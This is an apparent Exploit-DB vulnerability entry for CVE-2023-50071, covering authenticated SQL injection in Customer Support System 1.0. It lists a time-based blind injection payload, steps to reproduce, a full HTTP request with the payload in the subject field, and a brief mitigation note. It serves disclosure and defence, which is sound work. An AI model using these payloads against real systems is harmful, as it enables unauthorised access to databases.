Customer Support System 1.0 - Multiple SQL Injection Vulnerabilities

vendor:

Customer Support System

by:

Geraldo Alcantara

7.1

CVSS

HIGH

SQL Injection

CWE

Product Name: Customer Support System

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE: CVE-2023-50071

CPE: a:customer_support_system:customer_support_system:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows

2023

Customer Support System 1.0 – Multiple SQL Injection Vulnerabilities

Multiple SQL injection vulnerabilities were found in Customer Support System 1.0, allowing authenticated attackers to execute arbitrary SQL commands via the parameters department_id, customer_id, and subject. An example payload could be '+(select*from(select(sleep(20)))a)+'

Mitigation:

To mitigate these vulnerabilities, input validation should be implemented to sanitize user inputs and the use of parameterized queries or prepared statements should be utilized to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: Customer Support System 1.0 - Multiple SQL injection
vulnerabilities
# Date: 15/12/2023
# Exploit Author: Geraldo Alcantara
# Vendor Homepage:
https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
# Software Link:
https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows
# CVE : CVE-2023-50071
*Description*: Multiple SQL injection vulnerabilities in
/customer_support/ajax.php?action=save_ticket in Customer Support
System 1.0 allow authenticated attackers to execute arbitrary SQL
commands via department_id, customer_id and subject.*Payload*:
'+(select*from(select(sleep(20)))a)+'
*Steps to reproduce*:

1- Log in to the application.

2- Navigate to the page /customer_support/index.php?page=new_ticket.

3- Create a new ticket and insert a malicious payload into one of the
following parameters: department_id, customer_id, or subject.
*Request:*
POST /customer_support/ajax.php?action=save_ticket HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0)
Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data;
boundary=---------------------------81419250823331111993422505835
Content-Length: 853
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko;
sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq;
PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="id"


-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="subject"

teste'+(select*from(select(sleep(5)))a)+'
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="customer_id"

3
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="department_id"

4
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="description"

<p>Blahs<br></p>
-----------------------------81419250823331111993422505835
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------81419250823331111993422505835--